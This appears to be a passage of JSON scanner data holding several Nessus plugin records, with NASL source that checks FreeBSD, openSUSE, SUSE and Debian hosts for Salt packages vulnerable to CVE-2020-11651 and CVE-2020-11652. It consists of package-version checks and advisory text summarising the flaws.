(rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-2019.2.0-5.67.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-22T01:58:00", "bulletinFamily": "scanner", "description": "F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the ", "modified": "2020-05-18T00:00:00", "id": "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL", "href": "https://www.tenable.com/plugins/nessus/136687", "published": "2020-05-18T00:00:00", "title": "FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136687);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/21\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n\n script_name(english:\"FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the 'root key' used to authenticate commands from the local\nroot user on the master server. This 'root key' can then be used to\nremotely call administrative commands on the master server. This\nunintentional exposure provides a remote un-authenticated attacker\nwith root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module\ncontains commands used to read and write files under specific\ndirectory paths. The inputs to these functions are concatenated with\nthe target directory and the resulting path is not canonicalized,\nleading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is\nexposed to unauthenticated requests by the ClearFuncs class) fails to\nsanitize the token input parameter which is then used as a filename,\nallowing insertion of '..' path elements and thus reading of files\noutside of the intended directory. The only restriction is that the\nfile has to be deserializable by salt.payload.Serial.loads().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://labs.f-secure.com/advisories/saltstack-authorization-bypass\"\n );\n # https://blog.f-secure.com/new-vulnerabilities-make-exposed-salt-hosts-easy-targets/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f051ee1b\"\n );\n # https://www.tenable.com/blog/cve-2020-11651-cve-2020-11652-critical-salt-framework-vulnerabilities-exploited-in-the-wild\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4975c617\"\n );\n # https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d05a29b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py32-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py33-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py34-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py35-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3000<3000.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T19:57:48", "bulletinFamily": "scanner", "description": "This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.", "modified": "2020-05-04T00:00:00", "id": "OPENSUSE-2020-564.NASL", "href": "https://www.tenable.com/plugins/nessus/136306", "published": "2020-05-04T00:00:00", "title": "openSUSE Security Update : salt (openSUSE-2020-564)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136306);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-564)\");\n script_summary(english:\"Check for the openSUSE-2020-564 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-2019.2.0-lp151.5.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T21:13:09", "bulletinFamily": "scanner", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-04-30T00:00:00", "id": "SUSE_SU-2020-1150-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136169", "published": "2020-04-30T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1150-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136169);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11652/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201150-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?85e05fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Server-Applications-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Python2-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-SP1-2020-1150=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-2019.2.0-6.27.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-2019.2.0-6.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T17:24:51", "bulletinFamily": "scanner", "description": "Several vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.", "modified": "2020-05-07T00:00:00", "id": "DEBIAN_DSA-4676.NASL", "href": "https://www.tenable.com/plugins/nessus/136372", "published": "2020-05-07T00:00:00", "title": "Debian DSA-4676-1 : salt - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4676. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136372);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"DSA\", value:\"4676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195\");\n\n script_name(english:\"Debian DSA-4676-1 : salt - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in 